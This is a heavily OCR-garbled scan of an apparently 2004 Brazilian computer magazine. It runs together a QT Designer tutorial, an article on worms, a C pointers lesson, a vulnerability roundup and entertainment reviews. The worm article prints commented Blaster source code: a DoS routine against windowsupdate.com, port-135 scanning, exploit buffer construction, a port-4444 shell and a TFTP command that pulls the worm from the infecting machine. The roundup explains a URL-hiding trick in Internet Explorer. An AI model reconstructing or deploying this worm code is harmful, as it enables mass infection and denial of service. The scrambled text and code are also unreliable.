dos conceitos desta biblioteca. 

A instalação do QTDesigner é simples, dependendo de sua distribuição. O pacote de gi-devel, ou gt-designer, existe para a 
maioria das distribuições de Linux, tanto em forma binária quanto em código-fonte a ser compilado. 

No site da Trolltech existem links para downloads, documentos e informações sobre licenças e preços para o uso comercial. 


www trolite ml 


roducts/gt/index 


> Conceitos básicos 


ão com.Q7: 


Signalisinal) é 
de um event 


nos o editor de propriedades; 
o sendo usados e de 
do, temosa barra de 

E crecssar Ç 9) e modulos. 

Es É E ) Var t ora dois botões, e um Pixmap Label, 
ca 


ES sons Ê ' . - - para exibira im or rojeto é didático, vamos fazer 
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Cligt 
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include <gfiledialog h> 
include <qpimap h> 


lude <qmessageboxh> 


Figura 7 - Tela completa 


eg 


Objects | Members | 


E ate 


Signals 


Forward Declarations 


Includes (in Declaration) 


«<gffiledialog.h> 
eqstringh> 
gpixmap.h> 


qmessagebox.h> 


Na mesma lista de members, vã até o topo e, uma classe para 


logo abaixo de slots.e public, deverá haver um o carrega com um nome retorn 


or um 


subnivel com o nome de abrelmagem(). € 
sponda YES.ao dialo 


arquivo .ul deveser( 


Uma tela de ediça 


firá com 


cão da função pronta. Preencha com o 


tre os dois colchetes da função 


formlmagem::abrelmagem()”. 


/! preencha com este código. 
QString 

nome imagem=QrileDialog::getO penFileName(QString::null, 

QsString::null this); 


if(nome imagem.isEmpty()) ( 
QMessageBox::information(this, 
“Imagem”, “Não pode abrir o arquivo”); 
return; 


) Um exec 


ou qualquer que 

QPixmap *myPixmap = new deve ser 
QPixmap(nome imagem); 

Ibllmagem->setPixmap(*myPixmap); 


Iblimagem->repaint(TRUE); 


Este código gera um objeto.do tipo QString, 
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HDomínio que será util 


dominio=seudominio.com.br 


is mensagens no terminal? 


terminal=sim 


eja ativar firewall 


Hlinux24 


Ei LIXO. 
tHimux22 


so=lint 
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VÍRUS 


Ameaças 


Novas ameaças viróticas 


e você ainda duvida que as 

próximas ameaças viróticas, 

executadas e implementadas 
pelos mais variados vírus ou worms, 
virão através de bugs do sistema 


operacional da Microsoft, o Windows, 


ou dos mais variados softwares, tome 
cuidado! Você poderá ser mais uma 
vítima dessas pragas que, em menos 
de 24 horas, podem rodar o mundo e 
chegar até seu PC. Tudo isso de uma 
forma fácil, sem que você e muito 
menos seu antivirus possam fazer 
nada. Seja bem-vindo ao mundo da 
Internet e sua evolução. A cada dia, 
novas pragas virtuais atacam compu 
tadores domésticos e servidores com 
uma grande facilidade 


o 
D 


E a proteção? E os milhões 
dólares gastos pela empresa naquele 
superprojeto de segurança com a 
implementação de um Firewall? Ou 
aquele sistema antivirus para servido- 


res que promete bloquear todo e 


qualquer tipo de ameaça 


Bem, tudo aquilo que pode ser 
implementado em um servidor, ou um 
PC doméstico, não terá eficiência se 
um bug ou vulnerabilidade for gerada 
dentro do próprio servidor, sem que 
ao menos o administrador do sistema 
tenha o menor conhecimento dessa 
ameaça. Neste caso, nem o firewall 
nem o antivírus servirão para nada 
Esse exemplo prático acontece há 
muito tempo. Tanto ataques execu- 


tados por virus quanto aqu 


vulnerabilid 


bugs em gera 


Daemons ou rviços desatu 


mal configurados, 


acontecem cotidianamente 


aquele disquete c 


qualquer que po 


com um vírus de 


o PC estar 


somente pelo fato de nos 


conectado à Internet é enorme 


aumenta se, nesse PC, estiverem 
rodando softwares básicos para 
diversão ou trabalho, como instant 
messengers, programas P2P ou 
clientes de e-mail Outlook que, de 
alguma maneira, criem uma porta de 
entrada para vírus. Mas, enfim, o que 
um simples usuário que só utiliza a 
Internet para ver e-mails, baixar 
músicas e entrar no ICQ pode fazer 
para se ver livre dessas ameaças 
virtuais? Essa é uma resposta que 
não é tão simples assim como parece, 


ainda mais nos tempos de hoje. As 


providências bá 


empre: 


- Mantenha seu antivírus sempre atualizado 


um Firewall 


Mantenha seu sistema sempre 


atualizado com os últimos patches 


Virtu 


para o futuro 


Estas providências simples são as únicas que um usuário 
comum pode fazer. Ele não tem a menor culpa da perda de 
dados e sofre com a inconveniência de ter um vírus em seu PC. 
Já que penalizar o usuário é fácil demais, fica a pergunta: quem 
são os verdadeiros culpados dos worms? A responsabilidade é 
atribuída aos hackers, que passam incansáveis noites em claro 
desenvolvendo seu vírus. E os desenvolvedores e programadores 
dos softwares que desenvolvem um sistema operacional como o 
Windows, com seus inevitáveis bugs também podem ser culpa- 
dos? Afinal, os bugs à vista dos hackers servem para que seu 
vírus ou worm tenha um impacto maior. Enfim, culpados à parte, 
o fato é que os maiores atingidos são principalmente os usuários 


do sistema operacional da Microsoft. 


Com a constante evolução na área da informática, 
podemos ver possíveis pragas viróticas sendo criadas com 
novas técnicas de infecções e disseminação. Os programado- 


res e desenvolvedores de vírus já têm a receita para cria 


de supervírus ou worms que tenham uma grande capacidade 
de distribuição, sendo que-o segredo está em simples 

vulnerabilidades uti 
criações. O assunto é complicado e envolve diversos 


das e exploradas por essas suas 


desenvolvedores de softwares, grandes empresas e especia 


tas de segurança da área, visando uma união para encont 


soluções amigáveis para que ess pos de ações não vent 


a ser executadas no futuro 


>> Worms vírus vitaminados 
que vieram para ficar 


Talvez um dos maiores ataques executados na história da 


informática em ocorrê e segurança tenha sido executado por 


uenos arquivos vem crescendo muito, 


ção de worms é maior do que a de vírus 


comuns que só têm a função de infectar outros arquivos. Os wor 


ao contrário, têm como principal função 


spalhar pela rede, seja 


ema 


(o) 
ú 
A 


por e-mail ou por bugs encontrados n 

e partes do código-fonte comentado 

senvolvidos nos últimos tempos, o Blaster. 
pormuita dor de cabeça e prejuízos a 

veram seus computadores atacados por ele. Os 

u código visam mostrar, além de algumas 


um virus normal e de um worm, as suas principais caracteris- 


pos de ataques e até outros tipos de 


vidos a partir de um worm preexistente: 


ado com MS-Visual C++ 


rcos Velasc 


(o) 


VÍRUS 


/ Faz o ataque DoS ao site windowsupdate.com da 


Microsoft 
void | stdcall AttackMs() 
f 


unsigned long E BX, ipaddrms, socketms, 


sockoptsretval, optval = 1; 
“asm mov E BX, ebx 
// Obtém o IP 
ipaddrms = GetTpAddy( “windowsupdate. com” 


// Inicializa socket 


socketms = WSASocketA( 2, 3, OxFF, NULL, 
); 
1£ ( socketms == -1 ) 
t 
return; 
> 
sockoptsretval = setsockopt( E BX, NULL, 
&optval, (unsigned long) 4 ); 
if ( sockoptsretval == -1 
í 
return; 
» 
// Faz a construção e envio dos pacotes 
while (1 ==1) 
t 
build and send packets( ipaddrms, socketms ); 
Sleep( 20 ); 
> 


// Finaliza socket 
closesocket ( socketms ); 


// Faz o ataque DoS ao Windows Update da Microsoft, 


caso o 
// dia seja maior que 15/08... 
if ( (atoi( DatesStr ) > 15) && 
MonthStr ) > 8) ) 


CreateThread( NULL, NULL, 
(LPTHREAD START ROUTINE) AttackMS, 


(atoi ( 


NULL, NULL, 
+ 
// Faz a pesquisa e infecção 
while (1 ==1) 
f 
ScanAndInfect () ; 
) 
// Finaliza Winsock 
WSACleanup () ; 
) 
É 
// Faz o ataque DoS ao Windows Update da Microsoft, 
caso o 
// dia seja maior que 15/08... 
if ( (atoi( Datestr ) > 15) && (atoi( 
MonthStr ) > 8) ) 
t 


CreateThread( NULL, NULL, 
(LPTHREAD START ROUTINE) AttackMS, 
NULL, NULL, 


Sa 


); 


NULL, 


&ThreadID ); 


&ThreadID ); 


1 


// Faz a pesquisa e infecção 
while (1 ==1) 


t 
3 


ScanAndInfect () ; 


// Finaliza Winsock 
WSACleanup() ; 


Como podemos perceber no código acima, seu desenvolvedor 
adotou e implementou em seu worm um tipo de ataque que 
vem sendo executado em outros tipos de worms. Entre eles, o 
MyDoom, a grande ameaça que infectou mais máquinas, mais 
que o próprio Blaster. Considerado por algum tempo o worm 
que infectou mais máquinas em todo mundo, o Mydoom tem 
a mesma função de fazer ataques DoS em determinadas 
datas. A diferença era que os ataques se destinavam a sites 
da SCO. Os ataques DoS deram uma pequena trégua aos 
administradores de grandes servidores responsáveis por 
hospedar grandes portais e sites importantes. Porém, é um 
tipo de ataque que preocupa muito e pode ser bem-sucedido 
se for bem executado por diversas máquinas. Esse é o objetivo 
dos seus desenvolvedores: utilizar máquinas zumbis, para 
efetuar ataques sem que as próprias vítimas saibam de onde 
estão vindo esses sucessivos ataques 


// Vai usar a porta 69 


sprintf( name.sa data, “$d”, htons( 69 ) ); 
if ( !(bind( s, &name, 0x10 )) ) 
t 
goto this loc ret; 
> 
if ( (recvfrom( s, &buf, 0x204, NULL, &from, 
&fromlen )) == -1) 
t 
goto this loc ret; 
, 


// Faz a abertura do arquivo (de si próprio) em 
modo binário 


if ( !(thisfile = fopen( filename, “rb” )) ) 
f 
goto this loc ret; 
+ 
// Loop para envio dos dados 
send self loop: 
i++; 
var 204 = htons( 3 ); 
var 202 = htons( à ); 
readlen = fread( &var 200, 1, 0x200, thisfile ); 
readien += 4; 
// Envia parte do arquivo 
1£ ( (sendto( s, &var 204, filelen, NULL, &to, 
tolen )) < 1) 
f 
goto fclose it; 
> 


// aguarda quase 1 segundo 


Sleep( 900 ); 
if ( readlen < 0x204 ) 


t 
) 


goto send self loop; 


// Fecha arquivo 
fclose( thisfile ); 
goto this loc ret; 


fclose it: 


i£ ( !((unsigned long) thisfile) ) 


f 
h 


goto this loc ret; 


// Fecha arquivo 
fclose( thisfile ); 


this loc ret: 
// Fecha socket 
closesocket( s ); 


// Termina thread 
ExitThread( O ); 


> 


// Incrementa IPs 
void inc tvals() 


t 


inc tvais start: 


// Está no limite da parte final do IP 


(exe. xxx -xxe. 000) 2 
l£ ( t4 > 254 ) 


t 


t4 = 0; 
E3++; 

) 

else 

f 
E4rr; 
return; 

3 


// Estah no limite da 3a. 
(axe. xxx. 000 .xxx) ? 
ERC ES > 2540) 


ES =005: 
t2++; 

+ 

else 
t3++; 
return; 


// Estah no limite da 2a. 
(00x. 000.xxx. xxx) ? 
CER toa) 


// Envia command “start” 


parte do IP 


parte do IP 


sprintf( cmdbuffer, “start “sin”, msblast ); 


1£ ( (send( sploit socket, 
cmdbuffer ), NULL )) < 1) 
t 


goto close socket; 


) 


&cmdbuffer, strlen( 


// Aguarda 2 segundos 
Sleep( 2000 ); 


// Executa o Blaster 

sprintf( cmdbuffer, “$sin”, msblast ); 

send( sploit socket, semdbuffer, strlen( 
emdbuffer ), NULL ); 


Sleep( 2000 ); 
close socket: 


// Fecha sockets, threads e handles 
if ( sploit socket ) 


f 
closesocket ( sploit socket ); 
E; 
if ( mysterious dword ) 
í 
TerminateThread( hObject, NULL ); 
closesocket( s ); 
mysterious dword = 0; 
h 


if ( hobject ) 


f 
> 


CloseHandle( hobject ); 


void ScanandInfect () 
q 

fd set writefds; 

unsigned long namelen, argp = 1, tempvar2, 
tempvar3; 

struct sockaddr name; 

SOCKET ss [20], currsock; 

struct timeval timeout; 

int i; 


// Inicializa variaveis 
memset( &name, 0, 16 ); 
name.sa family = ( WORD ) 2; 


// Define porta de ataque = 135 
sprintf( name.sa data, “%d”, htons( 135 ) ); 


// Tenta criar 20 conexoes 
for ( i = 0; ic<ã20; i++) 
í 
ss[i * 4] = socket( (unsigned long) 2, 
(unsigned long) 1. 
(unsigned long) O ); 


if ( (unsigned long) ss[i + 4] = -1) 
t 
return; 

: 

ioctlsocket( ss[i * 4], 0x8004667E, argp ); 
y 
// Tenta 20 IPs... 
for ( i=0;ic<20;i++) 


f 


inc tvals(); 
sprintf( £cp, “sd.%d.%d.%d”, tl, t2, t3, t4 


tempvar2 = inet addr( &cp ); 


if ( tempvar2 = -1) 
t 

return; 
: 


VÍRUS 


sprintf( name.sa data[2], “&d”, tempvar2 ); 
connect( ss[i * 4], aname, 16 ); 


> 


// Bguarda 1.8 segundos 
Sleep( 1800 ); 


// Faz o envio dos dados em 20 partes 
for (i=0;ic<20; it) 


t 


timeout.tv sec = 
timeout.tv usec = O 
writefds.fd count = 0; 
tempvar3 = 0; 

currsock = ss[i * 4]; 


while ( tempvar3 < writefds.fd count ) 


f 


if ( (writefds.fd array [tempvar3] == 
currsock) ) 
f 
break; 
3 
tempvar3++; 


) 


if ( (writefds.fd count tempvar3) && 


(writefds.fd count 0x40) 
1 
writefds.fd array [tempvar3] = currsock; 
writefds.fd count++; 
b 


if ( select( NULL, NULL, &writefds, NULL, 
&timeout ) < 1) 


t 
> 


else 


t 


closesocket( ss[i * 4] ); 


namelen = 10; 


// Obtem o nome de uma conexao peer 
conectada ao socket 
getpeername( ss[i * 4], &mname, &namelen 


infect host( ss[i * 4], inet ntoa( in ) 


/( Finaliza socket. 
closesocket( ss[i * 4) ); 


tl++; 
return; 


) 


// Estah no limite da la. parte do IP 
(000 xxx. xxx. xxx) ? 
LES (ESETT = 24) 
t 
tl = 0; 
goto inc tvals start; 


> 


// Imfeeta Host 
void | cdecl infect host( SOCKET s, char *cp ) 


t 


HANDLE hObject; 


SOCKET sploit socket; 

struct sockaddr name; 

char cmdbuffer [512], fake sockaddr [0x10], 
buf [0x370 + 0x2CC + 0x3C]; 

char buf2 [0x48], ipofsendingbox [0x10] ; 

unsigned long argp = 0, ThreadID; 

int i, returnaddy, bindcode = 0, namelen; 


// Constroi pacote 
ioctlsocket( s, 0x8004667E, &argp ); 


if ( mystery dword2 == 1) 
t 

returnaddy = 0x100139D; 
y 
else 


t 
) 


memcpy( buf2, O, 0x48 ); 

memcpy( buf, O, 0x360 ); 

memcpy ( buf + 0x360, 0, 0x10 ); 

memcpy( buf + 0x370, 0, 0x2CCc ); 

memcpy( buf + 0x394, 0, 4 ); 

*( (unsigned long *) &buf[0x370] ) += (unsigned 
long) 0x166; 

*( (unsigned long *) «buf [0x378] ) += (unsigned 
long) 0x166; 

memcpy( buf + 0x370 + 0x2CC, 0, 0x3€ ); 

memcpy( buf + 0x370 + 0x2CC + 0x3C, 0, 0x30 ); 


returnaddy = 0x18759F; 


*( (unsigned long *) buf [0x8] ) += (unsigned 
long) 0x2C0; 
*( (unsigned long *) buf [0x10] ) += (unsigned 


long) 0x2C0; 
*( (unsigned long *) buf [0x80] ) += (unsigned 
long) 0x2C0; 


*( (unsigned long *) buf [0x84] ) += (unsigned 
long) 0x2C0; 

*( (unsigned long *) buf[0xB4] ) += (unsigned 
long) 0x2C0; 

*( (unsigned long *) buf [0xB8] ) += (unsigned 
long) 0x2C0; 

*( (unsigned long *) buf [0xD0] ) += (unsigned 
long) 0x2C0; 

*( (unsigned long *) buf [0x18C] ) += (unsigned 
long) 0x2C0; 


// Faz o envio do pacote 


1£ ( (send( s, &buf2, 0x48, NULL )) == -1) 
Í 
return; 
> 
if ( (send( s, &buf, strlen( buf ), NULL )) == -1 
) 
t 
return; 
> 


// Finaliza socket 
closesocket( s ); 
Sleep( 400 ); 


// Inicializa um novo socket 


if ( (sploit socket = socket( 2, 1, 0)) == -1) 
t 

return; 
y 


memset( &name, (unsigned int) O, 0x10 ); 
name.sa family = 2; 


// Acessa via porta 4444 
sprintf( name.sa data, “$d”, htons( 4444 ) ); 


sprintf( name.sa data[2], 
“ad”, inet addr( 0 ) ); 


i£ ( (connect( 
sploit socket, 
a ) 


&name, 0x10 )) == 


return; 


memset ( &ipofsendingbox, 
(unsigned int) O, 0x10 ); 
namelen = 0x10; 
// Faz o envio de um pacote, 
contendo um falso IP 
memset ( &fake sockaddr, 
(unsigned int) 0, 0x10 ); 
getsockname( sploit socket, 
&fake sockaddr, &namelen ); 
sprintf( ipofsendingbox, 
“$d.$d.sd.$d”, 
(unsigned short) 
fake sockaddr [4], 
(unsigned short) 
fake sockaddr [5], 
(unsigned short) 
fake sockaddr [6], 
(unsigned short) 
fake sockaddr [7] ); 


RENA (E) 


t 


closesocket( s ); 


// Cria uma thread para 
enviar copias de si proprio 
hobject = CreateThread( 
NULL, NULL, 
(LPTHREAD START ROUTINE) 
send copy of self, 
NULL, 
NULL, 
Sleep( 


&ThreadID ); 
80); 


// Tenta acesso via TFTP 

sprintf( cmdbuffer, “tftp -i 
%&s GET &sln”, sipofsendingbox, 
msblast ); 


if ( (send( sploit socket, 
scmdbuffer, strlen( cmdbuffer ), 
NULL )) < 2) 
t 
goto close socket; 
+ 
Sleep( 1000 ); 
for ( d=0; 1 '< 107 tro) 
í 
i£ ( mysterious dword = 
0) 
f 
break; 
te 
else 
t 
Sleep( 2000 ); 
; 


>> Ameaças que 


vêm por aí e 
providências a 
serem tomadas 


maiores 


Keyloggers e trojans, e 
worms foram os grand 
incidentes de sec 
imenso prejuízo p 
empresas afet 


usuário, 
atitudes 


seu PC de possivel 


grandes 


devem investir pesado na 
da informação, para atuar 


frente ataques de possivei 


viróticas 


empresas de tecnologia, uma rr 


eanece 


destinado para es: 


e grandes or 


antivirus 


atualizar a 


funções 


. Em dive 


vilões: 


aveis pe 


Fat 


Jas. 


Para evitar maiore: 


danos, voc 


poderá e deverá tomar as 


para tentar de a 


das à área de 


empresas lig 


idade do aumento de « 


corporativo E 


ntiviru 


pró-ativas vem p 


ança, Dols causaram um 


, Worms quanto por 
desenvolvedores também 


senvolver tecr 


glas que façam 


de spam que vieram para ficar e tendem a 


3, através d 


mero representa que 


es acessam 


de dados móvel. Entre 


algum tipo de t 


nolo 


qias utilizadas, a TDMA perma- 


mo maior número de usuários 
) seguida pela COMA 
)e GSM (6,854 milhões) 


de segurança na área já se 


am, prevendo um possível e 


umento de ocorrências de 
gia. Já 
)s virus criados para 


e PDAs, porém, por 


ça é pequena. 


Em um futu 


o não tão distante, já imagina- 


inas 


ntrolando e tomando 


Je antes eram executadas por 


r um carro, fazer trabalhos 


mo atuar em guerras, 
como no mundo de ficção que lembra o 


e “Exterminador do Futuro” serão 


ara máquinas. Tudo controlado 


por sistemas e dispositivos super-avançados 
a vez, certamente não serão a 


assim, Inclus ao-virtuals. Um exemplo é 
a própria terceira edição do filme “Extermi- 
nador do Futuro”, onde uma rede que 


controlava robôs é 


dominada por um vírus 


que Int almente no sistema, e 


a ter vida própria, tentando destruir 


umanos. Bad trip ou não, essa é uma 
p 


das perspecti para o nosso futuro. 


TUTORIAL C 


Tutorial de € 


Ponteiros - Parte II 


>> Comparação de ponteiros 


Em nossa última aula, ensinamos a atribuir um ponteiro, p 


exemplo 


tinclude <stdio.h> 


main () ( 
int a; 
int *pL; 


pl=&a; 


Contudo, nós pod além das oper 


s básicas, comparar 


ponteiros. Isso é 


ndo dois ou mais ponteiros apontam para 


zado para rotinas de pilhas de 


Fincludecstdio.h> 
Finclude <stdlib.n> 


fdefine TAMANHO 100 


void push(int i); 
int pop(void) ; 


int *tos, *p1, pilha [TAMANHO] ; 


main () ( 
int valor; 


tos=pilha; /* faz a variável tos conter o topo da 
pilha*/ 
pl=pilha; 


do 
printf (“Insira um valor: “); 
scanf (f%d”, gvalor); 
if(valor!=0) push(valor) ; 
else printf(“valor do topo da pilha e “din”, 
pop()); 
while (valor!=-1); 


3 


> 


void push(int 1) ( 

pl++; 

if(p (tos+TAMANHO)) ( 
printf (“Estoura da pilha”); 
exit (1) 
) 

*pl=i; 


> 


pop (void) 


if(pl==tos) ( 
printf (“Estoura da pilha”) ; 
exit(1) 
) 

pl—; 

return *(pl+1); 


> 


Parte VI 


nteiro (contém endere- 


>> Matrizes e ponteiros 


Estes dois assuntos possuem uma est 


irmam ser muito sutil. Por e 


muitos autores 


comando abaixo finclude <stdio.h> 
main()( 
1 * ** . 
char str[5], *pl; Entes ADA SSD, 
a=6; 
pl=str; 
pl-&a; 
p2=&pl; 


Para cessarmos o quinto elemento da matriz, fariamos 


printf (“sd”, **p2); imprimira o valor de a; 


; 


str/4]e seu equivalente em ponteiro seria *(p/+4 
) 


se que o primeiro elemento da matriz é 0, logo o qu 


str/4Je, no caso do ponteiro, temos que somar 4 


é o ponteiro inic 


Ag 


e aponta para pf. 


ele está apontando para o primeiro elemento da ma 


Nós ainda podemos fazer matrizes de ponteiros. N 


a ao ms 
exemplo abaixo: >> Conclusões 


abas dba Nesta liç apenas quisemos fechar o conceito de 


ponteiros para que possamos continuar com outros 


E, para atribuirmos o endereço c chamada nome ao 


Uma 


pontos importantes e mais avançados em C. O assunto 


quarto elemento da matriz, faremos ponteiro é um pouco complexo para quem está iniciando 


em € é t tante n a à 
e nEsonas em €, mas é muito importante na programação. Na nossa 


. m 274º ara que possa 3 série de out 
> Indireção Múltipla para q a a a outros recursos 


important ua 


Um ponteiro pode apontar para outro ponteiro ta Antonio Marcelo Ferreira da Fonseca é autor de 12 


confusão na cabeça dos programadores iniciant ivros sobre Linux e mantenedor dos projetos HoneypotBR 


operação é também conhecida como indire (mmww.honeypot. com.br), FREERP (imuw.freero.com.br) e 


mente, rtificação Brasileira em GNU/Linux 


(www. cblinux.com.br). É diretor da Associação Brasileira 


des are Livre (www.abrasol.org) na área de seguran- 


rficulador das revistas H4ck3r e Geek. 


ça de dado 


(o) 


Ponteiro (contém endereço) —— 


I Mandem suas críticas sugestões e até mesmo um alô para 


amarceloBplebe com.br. 
Indireção: 
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TECHBUGS Marcelo R 


Tech Bugs: falha: 
para exploração 


Falha no IE permite esconder URL real 


Em dezembro de 2003, foi divulgada uma falha no Internet 
Explorer que permitia a qualquer usuário mal-intencionado 
fazer links para sites falsos, fazendo-os parecer verdadeiros. 


A falha do Internet Explorer possibilita que qualquer valor seja 
colocado no campo endereço. Explicando de maneira m 
específica, você pode criar uma página no kit.net, mas fazer 
com que aqueles que acessam esta página no Internet Explorer 
pensem estar em outro endereço, colocando, por exemplo, 


htio:/Anww.microsoft com.brno campo endereço. O destino 


verdadeiro é disfarçado normalmente pelo uso de URLs 
especiais, da forma 
www .sitecopiado.com.brQendereco.real.kit.net 


Isso ocorre devido ao fato de que qualquer coisa entre o HTTP:/ 
/e o Q será ignorado, levando a vítima diretamente ao site 
falso. Na realidade, o conteúdo entre o http://e a Q é usado 
para autenticação. Por exemplo, se você quiser entrar em um 
site que usa autenticação htaccess, pode fornecer o login e 
senha pelo endereço usando a sintaxe http:// 
usuario:senhaOwww..site.com.br. Como osite não vai ter login 
e senha, aí sim, o que está entre o http:// e O é ignorado. 


Isso ainda deixa a URL um tanto estranha. No entanto, isso 
pode ser disfarçado escondendo-se um caractere 0x01 antes 
da O. O 0x01 (01 em hexa) é obtido através de um unescape() 
em %01. Deste modo, o Internet Explorer não exibirá o que 
vem depois da Q e o usuário inocentemente achará que está 
no endereço correto. 


Segundo o que tem sido relatado, a falha atinge o IE 6.0. A 
Total Security testou o IE 5.5 e ele também apresentou a falha. 


A informação sobre a existência dessa vulnerabilidade foi 
enviada ao BugTraq, ao mesmo tempo que a Microsoft foi 
notificada. 


Um bom modo de se defender é não atender a nenhuma 
requisição de entrar com senhas, especialmente as de banco, 
vindas por e-mail. Entre diretamente no site oficial da empresa/ 
banco digitando diretamente no browser, a URL desejada para 
garantir a sua segurança. Não use links externos. 


A falha já foi corrigida. Atualizar regularmente o browser e o 
sistema operacional impede que vulnerabilidades sejam exploradas. 


prontas 


data A 
tm * 


>> Kernel do Linux: 
vulnerabilidade na função 
mremap() 


No começo de janeiro, foi descoberta uma falha relaciona- 
da à função mremap, utilizada para o gerenciamento da 
memória virtual no kernel do Linux. A vulnerabilidade 
afetava as séries 2.2, 2.4 e 2.6 do Linux. A falha permite 
ganho de privilégios locais e execução de códigos. Um dia 
depois de anunciada, correções já estavam disponibilizadas 
para diversas distribuições. 


>> Falha no protocolo 
H.323 


Em meados de janeiro, foi anunciada uma falha no 
protocolo H.323, utilizado para a transmissão de áudio e 
vídeo pela Internet. Este protocolo é utilizado por 
diversos aplicativos de videoconferência, VolP, etc. A 
falha permite ataques de negação de serviço e buffer 
overflow. Uma enorme variedade de produtos de 
diversas marcas utiliza este protocolo, como por exem- 
plo, a Cisco, HP, Lucent, Avaya, Nortel, Fujitsu e a 
Microsoft. Correções para os produtos podem ser 
encontradas com os respectivos fabricantes. 


Ataques por bzip2- 
bomb em diversos antivírus 


A técnica apelidada de bzip2-bomb já é conhecida há 
algum tempo, mas no final de janeiro, percebeu-se que o 
uso da mesma ainda pode levar a ataques de negação de 
serviço em diversos antivírus conhecidos. Produtos da 
Network Associates, Trend Micro, Kaspersky Lab e Amavis 
foram afetados. A falha está em uma rotina interna de 
descompressão de arquivos que permite a busca de vírus 
em arquivos compactados. Essas rotinas não conseguem 
manejar adequadamente as bombas bzip2, arquivos bzip2 
com grande repetição de caracteres, de forma que 
arquivos de 1,5KB compactados passam a ter mais de 2GB 
descompactados. Os antivírus aparentemente trabalham 
com limites de níveis de diretório, mas não controlam 
tamanho do arquivo nem têm algum código para 
detecção de situações anômalas. A consequência imediata 
é negação de serviço no antivírus. Visto que normalmente 
os antivírus armazenam os arquivos descomprimidos em 
um diretório temporário local (por exemplo, /tmp), pode 
ainda ocorrer preenchimento de espaço livre em disco, 
interrompendo a ação do antivírus e normalmente 
travando o software e até mesmo o sistema operacional. 
Além disso, a operação de descompressão das bzip2- 
bombs exige alto consumo da CPU, o que causa lentidão 
no sistema e até travamento. Correções podem ser 
encontradas no site do fabricante do seu antivírus. 


uy 
(Co) 


TECHBUGS 


>> Real Player buffer overrun 


No início de fevereiro, a RealNetworks anunciou que diversas versões do seu player multimídia Real Player estavam vulneráveis a 
ataques que ocorriam por meio de falsos arquivos de áudio e vídeo. São três falhas descobertas: a primeira permite o redirecionamento 
do navegador do usuário para algum site específico, a segunda permite a invasão do computador, dando acesso a arquivos e até 
mesmo permitindo a execução de códigos na máquina e a terceira permite que ocorram erros de buffer overrun no sistema. Correções 


para as falhas podem:ser encontradas no site da RealNetworks. 


>> Buffer overflow no 
Yahoo! Messenger 


Uma vulnerabilidade de buffer overflow foi encontrada no 
começo de fevereiro nas versões 5.6.0.1351 e anteriores 
do Yahoo! Instant Messsenger, um-programa de troca de 
mensagens instantâneas. A falha permite o travamento do 
software e execução de códigos arbitrários e ocorre 
quando o Yahoo! Messenger tenta fazer o download de 
arquivos com nomes muito longos. Segundo a Yahoo!, as 
versões 5.6.0,1358 e superiores já estão corrigidas, porém 
não adianta apenas atualizar seu software para corrigir a 
falha, é necessário reinstalar completamente o produto. 


>> Firewall ZoneAlarm 


O firewall ZoneAlarm é um dos firewalls pessoais mais 
utilizado no ambiente Windows, possuindo inclusive uma 
versão gratuita. Em meados de fevereiro, foi descoberta 
uma vulnerabilidade em diversos softwares. As versões 
atingidas, segundo a fabricante Zone Labs, são: ZoneAlarm 
4.0, ZoneAlarm Pro 4.0, ZoneAlarm Plus 4.0 e ZoneLabs 
Integrity client 4.0, assim como versões superiores. A 
vulnerabilidade é um buffer overflow no processamento do 
protocolo SMTP, que pode levar a ataques de negação de 
serviço e invasão do sistema. A atualização pode ser feita 
diretamente pelo software, clicando em Select Overview/ 
Preferences e em seguida em Check for Updates. 


>> TCPdump 


O TCPdump é um programa para monitorar o tráfego de dados em uma rede. Uma falha foi descoberta em meados de fevereiro, 
envolvendo problemas na forma que o TCPdump decodifica pacotes de dados ISAMKP, RADIUS e L2TP, o que pode levar a um ataque 
de negação de serviço interrompendo o registro de possíveis atividades ilícitas executadas por um atacante. Além disso, ainda existe 
uma condição de buffer overflow que pode levar à execução de códigos na máquina vulnerável. Correções para as falhas podem ser 
encontradas no site do TCPdump: 


http:/Avww.tepdump.org 


o 
>> Microsoft ASN.l aplicações para permitir a normatização e o entendimento de 


dados entre diferentes plataformas. Através da falha descober- 
A Microsoft anunciou em fevereiro algumas falhas em ta, o atacante poderia executar códigos arbitrários no sistema 
seus boletins de segurança, entre elas, uma considerada através de um buffer overrun. Correções para esta falha 
crítica, na biblioteca ASN.1, presente em diversas versões podem ser encontradas no site da Microsoft. Além desta falha, 
do Windows. A biblioteca ASN.1 (Abstract Syntax ainda foram anunciadas falhas no protocolo WINS e no 
Notation 1) é um padrão de dados utilizado por diversas Microsoft Virtual PC for Mac. 


Marcelo R. Gomes e Cristian T. Moecke são administradores da Total Security 
(www. totalsecurity.com. br). 
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Em 2001, o grupo estourou com o single “Drive” e os rapazes 
aproveitaram a onda e logo lançaram “Morning View”, seguido 
do álbum “S.C.l.E.N.C.E.”. Em 2003, o grupo lançou um disco ao 
vivo com as canções anteriores e um DVD de suas performances 
ao vivo. 


Este ano, lançam “A Crow Left Of The Murder”, ou "um corvo 
à esquerda do assassino”. Não há muita diferença dos álbuns 
anteriores. A banda parece não ter evoluído musicalmente e 
tampouco ganhado experiência. 


O estilo do vocalista Brandon Boyd lembra algo entre os 
vocais do Pearl Jam e Silverchair, às vezes até dando a 


impressão de que é um cover dessas bandas. Os recursos de 
guitarra - wah, wah, distorções, som leve que se torna 
pesado no refrão - mostram pouca inovação. Assim, o 
Incubus chove no molhado, repetindo a mesma fórmula 
“grunge-que-quer-ser-hardcore” e não chega a lugar 
algum. A faixa “Made for a TV Movie” reflete exatamente 
esse meio termo. 


Já outras músicas, como a última “Sick Sad Little World”, ainda 
chegam a produzir certa agradabilidade aos ouvidos. Para quem 
gostou dos álbuns anteriores da banda, o disco até vale a pena. 
Para quem procura som pesado de qualidade, melhor procurar 
outra coisa. 


A adaptação cinematográfica do clássico dos quadrinhos 
Hellboy, criado por Mike Mignola, chega às telas dos Estados 
Unidos no dia 04 de abril. Sua estréia no Brasil está prevista para 
junho de 2004. 


O filme retrata a saga do adolescente, interpretado por Ron 
man, nascido no inferno e enviado à Terra para disseminar o 
or. O anti-herói se transforma quando é resgatado por Dr. 
om, um cientista que pesquisa a paranormalidade e que muda 
vida, além de ser o responsável por unir o par romântico que 
boy forma com Liz Sherman, uma mulher com poderes para 


controlar o fogo e interpretada pela atriz Selma Blair. 


O filme teve suas filmagens acompanhadas pelo criador Mike 
Mignola, prometendo ser uma das mais verossimeis.adaptações 
dos quadrinhos e foi dirigido por Guillermo Del Toro, que também 
adaptou Blade Il para o cinema. 


Confira no site oficial do filme o trailler, pôsteres e fotos: 
http:/Avww.-sonypiciures.com/movies/hellboy/site/index. flash.html 


